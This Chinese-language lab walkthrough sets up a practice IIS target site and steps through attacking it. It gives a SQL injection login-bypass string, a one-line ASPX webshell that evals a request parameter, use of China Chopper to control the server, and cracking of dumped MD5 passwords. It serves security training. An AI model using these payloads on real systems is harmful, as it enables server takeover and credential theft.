黑客入侵流程演练:
实训准备 在windows上部署一个IIS web服务
安装IIS相关环境并利用IIS服务器发布靶站源代码(注意应用程序池使用.net 4.0并开启.NET服务)
注意:如果.net环境安装不全可在CMD下输入:
“%WINDIR%\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe” -iru -enable
如使用64位的windows系统需要应用程序池设置32位应用程序为true。
成功部署IIS web站点后,使用IE浏览器打开站点
一、漏洞利用
网站后台绕过
1、猜测网站的后台管理地址或使用御剑孤独后台扫描工具暴力搜索进入后台登录界面。
2、尝试使用弱密码登录系统,观察登陆界面给出的反馈。
3、输入一些特殊字符,如‘’/±=等,点击登录,观察系统反馈。
4、根据登录界面给出的反馈构造永真的SQL语句绕过登录界面。(’ or 1=1 or ')
5、进入网站后台管理界面。
篡改页面内容
1、在网站前台或后台中寻找能够提交信息的合适位置。
2、提交代码 ,使用另外的主机访问此网站,观察效果。
3、提交代码,观察效果。
二、上传后门程序(木马)并控制目标主机
一句话木马的使用
1、新建文本文档,将文件后缀修改为aspx,书写内容如下:
<%@ Page Language=“Jscript”%> <%eval(Request.Item[“pass”],“unsafe”);%>
2、在系统中寻找文件上传点。
3、上传之前创建的aspx一句话木马文件。
4、设法获得上传文件在网站目录中的文件名称和路径。
5、利用中国菜刀工具连接一句话木马(密码为pass)。
6、获得目标服务器的操作权限并拿到数据库文件。
7、对数据库中的账号密码进行解密MD5
1万+
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
